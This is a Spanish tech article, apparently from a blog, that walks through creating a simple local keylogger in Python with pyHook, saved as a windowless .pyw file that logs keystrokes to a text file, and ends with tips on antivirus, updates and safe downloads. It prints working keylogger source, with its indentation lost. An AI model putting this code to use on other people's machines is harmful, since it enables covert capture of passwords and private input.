Crea un keylogger con el Bloc de notas

Crea un keylogger con el Bloc de notas

Javier Jiménez

Los keyloggers son un tipo de herramienta que utilizan los piratas informáticos para robar contraseñas. Es una más de las muchas amenazas que hay en la red. Sin embargo, su creación no es para nada compleja. Simplemente hay que tener los conocimientos necesarios y una serie de aplicaciones. De esta forma podrás poner a prueba tus claves y estar preparado para un ataque real en el que puedan romper tus claves. Vamos a explicar cómo puedes hacerlo.

Cómo funciona un keylogger

Este tipo de malware tiene como misión registrar todas las teclas que pulsamos en el teclado. De esta forma, cada vez que iniciamos sesión en el correo, en Facebook o en cualquier otro servicio, el programa va a registrar lo que estamos poniendo y así robar la clave de acceso y el nombre de usuario.

Un keylogger podemos decir que es una de las herramientas de malware más antiguas. Aunque hoy en día los antivirus son capaces de detectar la mayoría de ellos, lo cierto es que los piratas informáticos siguen perfeccionando sus técnicas y logran llegar a más víctimas tanto de ordenadores como en dispositivos móviles.

Suele ocultarse en un archivo que descargamos por Internet, una aplicación que hemos instalado y similares. Se ejecuta en segundo plano en nuestro sistema, sin que sepamos realmente que está funcionando, y mientras registra todas las pulsaciones del teclado. Esto, posteriormente, puede enviarlo a un servidor controlado por los atacantes.

Incluso puede que ese keylogger esté diseñado únicamente para registrar las contraseñas a nivel de sistema y se almacenan en el propio ordenador. Si es un equipo compartido, otra persona podría ver cuáles son las claves.

Pasos para crear uno

Vamos a explicar cómo podemos crear un keylogger a nivel local, para poner a prueba nuestras contraseñas. Crear uno de forma remota sí es más completo. Lo que vamos a hacer es registrar las pulsaciones de teclas de nuestro ordenador. Hay que tener en cuenta que esto debemos hacerlo únicamente para uso personal, para poner a prueba nuestras propias contraseñas y no afectar a terceros que puedan usar ese equipo.

Abrir el Bloc de notas

Lo primero que tenemos que hacer es abrir el Bloc de Notas de Windows o cualquier otra aplicación donde podamos escribir en texto plano. Incluso valdría el propio editor de Python. En ese documento que hemos creado, hay que escribir el siguiente código:

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
<pre>

Hecho esto, lo siguiente que debemos hacer es guardar el archivo en formato pyw. Por ejemplo, podemos darle el nombre de Keylogger.pyw. Simplemente con estos pasos ya tendremos listo nuestro keylogger escrito en Python. A partir de ese momento ya podremos registrar todas las pulsaciones de teclas del teclado de nuestro equipo. Todo esto que va a ir registrando lo guardará en un documento independiente.

código keylogger sencillo

Descargar e instalar Python

Es imprescindible tener instalado Python para que funcione. Si no lo tienes instalado en Windows, puedes ir a la página web oficial y descargar la última versión. Actualmente es la 3.10.1. Además, es necesario instalar PyHook y Pywin32 para que funcione sin problemas.

Cuando lo tengamos instalado y listo para usar, ya solo tendríamos que ejecutar el archivo que creamos previamente. Hay que ir a la ruta donde guardamos Keylogger.pyw (o el nombre que le quisiéramos dar) y hacemos doble clic. Desde ese momento ya empezará a registrar cualquier pulsación de teclas que hagamos.

Proceso en el Administrador de tareas

Si quieres comprobar si está funcionando o no correctamente, solo tienes que ir al Administrador de tareas de Windows. Para ello debes pulsar la combinación de teclas Ctrl+Alt+Supr y allí lo abres. Aparecerán todos los procesos que se encuentran en ejecución y el que nos interesa en este caso es pythow.exe.

Finalizar keylogger proceso python

Cuando quieras finalizarlo, lo único que tendrías que hacer es ir al Administrador de tareas, pinchar encima del proceso y le das a Finalizar. Automáticamente ya dejará de registrar las teclas que se pulsen en el teclado y generará un documento de texto en formato .txt. Es ahí donde aparecerá todo lo que se ha pulsado.

Ver el archivo con las contraseñas

Para ver el archivo de texto con todas las claves que ha ido registrando (así como cualquier pulsación de teclas) tenemos que ir al directorio donde se encontraba el archivo en formato .pyw, ya sea Keylogger.pyw o el nombre que le pusiéramos, y allí aparecerá un archivo de texto de nombre keyloggeroutput.txt.

Pulsaciones registradas keylogger

Una vez abierto veremos algo similar a lo que aparece en la imagen de arriba. Podremos ver las teclas que ha ido registrando. Es sencillo, ideal para poder poner a prueba las contraseñas que ponemos en Windows y ver hasta qué punto podrían robar nuestras claves en caso de sufrir un ataque más sofisticado que puedan controlar de forma remota.

Consejos para estar protegidos

Después de ver cómo podríamos crear un sencillo keylogger para usar a nivel personal, en nuestro ordenador, vamos a dar algunos consejos para evitar ser víctimas de este tipo de ataques. Es imprescindible estar protegidos para que no puedan robar nuestras claves de acceso.

Programas de seguridad

Lo primero es contar con programas de seguridad. Un buen antivirus es fundamental para evitar la entrada de virus. Por ejemplo podemos nombrar el propio Windows Defender, Avast, Bitdefender o cualquier otro. Hay muchas opciones, pero siempre debemos elegir uno de garantías.

Más allá de un antivirus, también podemos contar con otras aplicaciones como firewall o incluso complementos para el navegador. En todos los casos van a ayudar a potenciar la seguridad y evitar las conexiones peligrosas que puedan servir para colar keyloggers y otras amenazas.

Tener todo actualizado

En ocasiones aparecen vulnerabilidades en los sistemas. Hay fallos de seguridad que afectan a ciertas aplicaciones, como puede ser el navegador. Eso podría derivar en la entrada de malware y en comprometer nuestra privacidad. Para evitar esto, algo imprescindible les contar con las últimas versiones.

Los parches de seguridad sirven para corregir esos problemas. Debemos tener actualizado Windows, el navegador y cualquier programa que usemos. Incluso los controladores de la tarjeta de red también deberían estar actualizados y disminuir así el riesgo de que puedan aparecer problemas.

Usar aplicaciones oficiales

Por supuesto, debemos en todo momento utilizar programas oficiales. Es cierto que a veces nos encontramos con la posibilidad de tener algunas aplicaciones que cuentan con funciones extra, pero al no ser oficiales no sabemos si son de garantías y de qué manera podrían afectarnos.

Un pirata informático puede haber creado un programa que simula ser legítimo pero en realidad sirve para robar información o colar un keylogger. Para evitar esto, debemos en todo momento descargar software desde tiendas oficiales y páginas seguras.

Sentido común

Un consejo más es mantener el sentido común. Es imprescindible evitar cometer errores, como por ejemplo descargar archivos que nos llegan por correo electrónico sin verificar la identidad o abrir links mediante sitios de terceros, los cuales pueden haber sido creados solo para robar datos.

La mayoría de ataques se producen con la interacción del usuario. Incluso los keyloggers, que en muchas ocasiones debemos descargar un archivo o instalar algún programa que previamente hemos bajado de alguna página insegura.

En definitiva, crear un keylogger para uso personal es muy sencillo, como hemos visto. No obstante, un atacante puede crear otro más sofisticado y poder robar contraseñas en remoto. Es imprescindible estar protegidos y no cometer errores que puedan afectarnos en nuestro día a día.

¡Sé el primero en comentar!